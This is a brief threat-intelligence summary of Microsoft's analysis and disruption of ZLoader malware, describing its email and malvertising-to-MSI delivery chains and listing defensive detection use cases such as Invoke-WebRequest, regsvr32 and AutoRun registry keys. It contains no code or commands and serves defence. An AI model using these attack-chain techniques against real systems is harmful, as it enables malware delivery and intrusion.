Microsoft Analyzes & Disrupts Zloader

Industry: N/A | Level: Tactical | Source: Microsoft

Microsoft's efforts with telecommunications providers have enabled the takedown of various ZLoader infrastructure. Microsoft has provided intelligence on the various attack chains associated with ZLoader involving different techniques used to deliver the ZLoader payload. The first attack chain involves delivery through email containing a malicious link or attachment downloading the ZLoader payload. A second attack chain leverages Google Ads, popular advertising software tools and compromised legitimate domains to stage malicious content on subdomains. A malicious MSI downloaded and executed by the victim triggers PowerShell and scripts to download the ZLoader payload. With the ZLoader payload dropped from both chains, the modular malware typically creates persistence, downloads additional payloads, or initiates enumeration to fulfill the attacker's objectives.

• Anvilogic Scenario: ZLoader Attack Chain with Delivery from MSI or Malicious Doc
• Anvilogic Use Cases:
• Malicious Document Execution
• MSIExec Install MSI File
• Rundll32 Command Line
• Common Reconnaissance Commands
• Executable Create Script Process
• Invoke-WebRequest Command
• regsvr32 Execution
• Wscript/Cscript Execution
• New AutoRun Registry Key